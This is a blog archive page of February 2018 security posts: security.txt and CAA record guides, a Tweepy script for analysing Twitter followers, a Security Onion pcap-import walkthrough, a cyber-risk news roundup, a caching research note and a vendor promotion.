Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of the #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.


Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that insurers are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Implement “security.txt” to advocate responsible vuln. disclosures


After discussing CAA records in DNS to whitelist your certificate authorities in my previous article, consider this: it's only a matter of time before someone finds an issue with your web presence, website, or any front-facing application. If they do, what do you expect them to do? Keep it under wraps, or disclose it to you "responsibly"? This article is for you if you advocate responsible disclosure; if not, you have some catching up to do with reality (I shall come back to you later!). Now, while we are on responsible disclosure, "well-behaved" hackers or security researchers can reach you via bug-bounty channels, your info@example email (not recommended), or social media, or they may struggle to find a secure channel at all. But what if you had a way to broadcast your "security channel" details to ease their communication and provide them with a well-documented, managed conversation channel? Isn't that cool? Voila: what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?" But where would you host this page - under contact-us, security, information, about-us, etc.? This is the very issue that security.txt evangelists are trying to solve - standardizing the file, its path, and its presence as part of the well-known URIs defined in RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in its early stages[1], but it is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it clearly signals that you take security seriously and are ready to have an open conversation with the security community if they want to report a finding, vulnerability, or security issue with your website/application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As security.txt follows a standard, here are some points to consider:

  • The security.txt file has to be placed in the .well-known directory under your domain's root, i.e. at /.well-known/security.txt.
  • It documents the following fields,
    • Comments: The file can have optional information in comments. Comments must begin with the # symbol.
    • Each field must be defined on its own line.
    • Contact: This field can be an email address, a phone number, or a link to a page where a security researcher can contact you. This field is mandatory and MUST be present in the file. It should adhere to RFC 3986[3] for the syntax of email, phone, and URI (which MUST be served over HTTPS). Possible examples are,
      Contact: mailto:security@example.com
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key itself, but a URI pointing to the key file.
    • Signature: If you want to demonstrate the file's integrity, you can use this directive to link to a signature of the file. The signature file must be named security.txt.sig and be accessible at the /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This directive can be used to acknowledge previous researchers and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then this is the place to post.
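Putting the fields above together, a minimal security.txt might look like the following (all contact details and URIs here are hypothetical placeholders, not a real organization's file):

```
# Our security address
Contact: mailto:security@example.com
Contact: tel:+1-201-555-0123
# Our OpenPGP key
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security-policy.html
Acknowledgement: https://example.com/hall-of-fame.html
Hiring: https://example.com/jobs.html
```

Save it as /.well-known/security.txt under your domain root and serve it over HTTPS.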

A reference security.txt extracted from Google,


Hope this article gives you an idea of how to implement a security.txt file, and why it matters.

Stay safe!

  1. Early draft posted for RFC review: ↩︎

  2. Google security.txt file: ↩︎

  3. Uniform Resource Identifier: ↩︎

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name can be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(user_ids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with io.open(filename, "w", encoding="utf-8") as f:
        f.write(json.dumps(variable, indent=4, ensure_ascii=False))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        with io.open(filename, "r", encoding="utf-8") as f:
            ret = json.load(f)
    return ret

def save_bin(variable, filename):
    with open(filename, "wb") as f:
        f.write(variable)

def load_bin(filename):
    ret = None
    if os.path.exists(filename):
        with open(filename, "rb") as f:
            ret = f.read()
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
    else:
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.search(match_expression, time_string)
    if match is not None:
        first_bit = match.group(1)
        second_bit = match.group(2)
        last_bit = match.group(3)
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) // batch_len
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches) + "\n")
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = [u._json for u in users_list]
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max // num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.items():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {}
                    id_str = user["id_str"]
                    entry[id_str] = {}
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"]
                    for f in fields:
                        if f in user:
                            entry[id_str][f] = user[f]
                    labels[label].append(entry)
    return labels

if __name__ == "__main__":
    account_list = []
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    # Fill in your own Twitter API credentials here
    consumer_key = ""
    consumer_secret = ""
    access_token = ""
    access_token_secret = ""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print("\t\tFollower age ranges")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.items()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.items():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print("\t\tMost common friends counts")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump


Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here are the top friends_count values of those accounts:


Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts, although not in as large a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account, and we don’t. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script, you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts).

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s a full list of those articles.

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in Equity, Morphisec raised $12M in Series B, & Dover Microsystems raised $6M "Seed" Round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years, there has not been a way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 ( ISO) or later. Next I downloaded the script using wget from

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap


Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29

Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to include those in the trace.

Here's another screenshot. Again I had to adjust for the proper time range.

Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap


Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:

The alerts show up in Sguil, too!

This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running it on an evaluation system, probably in a virtual machine. I did all my testing on VirtualBox. Check it out!

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.


Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed due to the ID numbers for some individuals being the same as their Social Security numbers and those ID numbers being shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information posted online when an attachment containing a list of individuals who had made submissions to the review of City of Ballarat’s CBD Car Parking Action Plan was posted online unredacted. Chase said that a “glitch” led to some customers’ personal information being displayed on other customers’ accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


The U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues last week.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that there was reluctant support from democrats on the commission who were calling for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to its untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon 2020 programme. The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds, without compromising on service level and security requirements. SSICLOPS federation supports the efficient integration of clouds whether they are geographically collocated or spread out, and whether they belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforces legal and security constraints, and minimizes overall resource consumption. In such a federation, individual enterprises can dynamically scale their cloud services in and out: they offer their own spare resources when available and take in resources from others when needed. This maximizes each member’s infrastructure utilization while minimizing its excess capacity needs.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.
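That original scheme can be sketched in a few lines of Python (a minimal illustration of an LRU cache whose entries carry a time-to-live, not F-Secure’s actual implementation; the class and method names are invented for this sketch):

```python
import time
from collections import OrderedDict

class TTLAwareLRUCache:
    """LRU cache whose entries also carry a time-to-live, as with
    reputation verdicts: expired entries are treated as misses."""

    def __init__(self, capacity):
        self.capacity = capacity
        self._items = OrderedDict()  # key -> (value, expiry timestamp)

    def get(self, key, now=None):
        now = time.time() if now is None else now
        entry = self._items.get(key)
        if entry is None:
            return None
        value, expires = entry
        if now >= expires:               # TTL elapsed: drop it, report a miss
            del self._items[key]
            return None
        self._items.move_to_end(key)     # mark as most recently used
        return value

    def put(self, key, value, ttl, now=None):
        now = time.time() if now is None else now
        self._items[key] = (value, now + ttl)
        self._items.move_to_end(key)
        if len(self._items) > self.capacity:
            self._items.popitem(last=False)  # evict the least recently used
```

A verdict thus falls out of the cache either when it is the least recently used entry under capacity pressure, or when its TTL expires, whichever comes first.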

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning to bring the new mechanism into our production proxy nodes in the near future.
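The windowed-LFU idea can likewise be sketched in Python (a simplified, hypothetical illustration: request frequencies are counted only over a sliding window of recent lookups, so the cache adapts when the popular set shifts; the predictive features mentioned above are omitted):

```python
from collections import Counter, deque

class WindowedLFUCache:
    """Evicts the least-frequently-used key, with frequencies counted
    only over a sliding window of recent requests, so the cache adapts
    when the set of popular items changes."""

    def __init__(self, capacity, window):
        self.capacity = capacity
        self.window = deque(maxlen=window)  # keys of recent requests
        self.freq = Counter()               # per-key counts within the window
        self.store = {}

    def _record(self, key):
        if len(self.window) == self.window.maxlen:
            oldest = self.window[0]         # about to slide out of the window
            self.freq[oldest] -= 1
            if self.freq[oldest] <= 0:
                del self.freq[oldest]
        self.window.append(key)             # full deque drops the oldest entry
        self.freq[key] += 1

    def get(self, key):
        self._record(key)
        return self.store.get(key)

    def put(self, key, value):
        if key not in self.store and len(self.store) >= self.capacity:
            # Evict the cached key with the lowest in-window frequency.
            victim = min(self.store, key=lambda k: self.freq.get(k, 0))
            del self.store[victim]
        self.store[key] = value
```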


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I last audited someone's DNS zone file, but recently, while checking a client's DNS configuration, I was surprised to find the CAA records set more or less at random, "so to speak". When I discussed it with the administrator, I was surprised to learn that he had no clue what CAA is, how it works, or why it is so important to configure it correctly. That made me wonder how many of us actually know, and how CAA can be a savior if someone attempts to obtain an SSL certificate for your domain.

What is CAA?

CAA, or Certificate Authority Authorization, is a record that identifies which certificate authorities (CAs) are allowed to issue certificates for the domain in question. It is declared via a CAA-type entry in the DNS records, which is publicly viewable and can be checked by a certificate authority before it issues a certificate.

Brief Background

While the first draft was written by Phillip Hallam-Baker and Rob Stradling back in 2010, the work accelerated in the last five years due to CA compromises and related attacks. The first CA subversion came in 2001, when VeriSign issued two certificates named "Microsoft Corporation" to an individual claiming to represent Microsoft; these certificates could have been used to spoof identity, deliver malicious updates, and so on. Later, in 2011, fraudulent certificates were issued by Comodo[1] and DigiNotar[2] after they were attacked by Iranian hackers, with evidence of their use in a MITM attack in Iran.

Then in 2012, Trustwave issued[3] a subordinate root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So it's high time CAs were restricted, or whitelisted, at the domain level.

What if no CAA record is configured in DNS?

Simply put, the CAA record should be configured to announce which CAs are permitted to issue a certificate for your domain. If no CAA record is present, any CA can issue a certificate for your domain.

CAA is a good practice for restricting which CAs may act for your domain, and their power to legally issue certificates for it. It's like whitelisting them in your domain!

The process now mandates[4] (yes, it mandates!) that a certificate authority query DNS for your CAA record; a certificate can only be issued for your hostname if either no record is available or that CA has been "whitelisted". A CAA record sets the rules for the parent domain, and those rules are inherited by sub-domains (unless otherwise stated in the DNS records).

Certificate authorities interpret the lack of a CAA record as authorizing unrestricted issuance, and the presence of a single blank issue tag as disallowing all issuance.[5]
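That decision logic can be sketched as follows (a deliberately simplified model of RFC 6844 processing; a real CA also climbs the domain tree to find the relevant record set and honors issuewild separately):

```python
def issuance_allowed(caa_records, ca_domain):
    """caa_records: list of (flag, tag, value) tuples from DNS.
    Returns True if the CA identified by ca_domain may issue a certificate."""
    if not caa_records:
        return True                       # no CAA record: any CA may issue
    issuers = {value.strip() for flag, tag, value in caa_records
               if tag == "issue"}
    if issuers == {""}:
        return False                      # single blank issue tag: deny everyone
    return ca_domain in issuers           # otherwise, only whitelisted CAs
```

The hypothetical CA names below are only for illustration; the point is that a misconfigured or absent record widens who may issue for your domain.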

CAA record syntax/format

The CAA record has the following format: <flag> <tag> <value>. The fields have the following meaning:

  • flag: An integer with values 0-255, as defined in RFC 6844[6]; it is currently used only to carry the critical flag.[7]
  • tag: An ASCII string (issue, issuewild, or iodef) that identifies the property represented by the record.
  • value: The value of the property defined in the <tag>.

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a single certificate authority to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a single certificate authority to issue only wildcard certificates for the domain in scope.
  • iodef: Specifies a URL (mailto:, http://, or https://) to which certificate authorities report requested or issued certificates that breach the CAA policy defined in the DNS records.

DNS Software Support

As per an excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B), Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns, and Windows Server 2016.
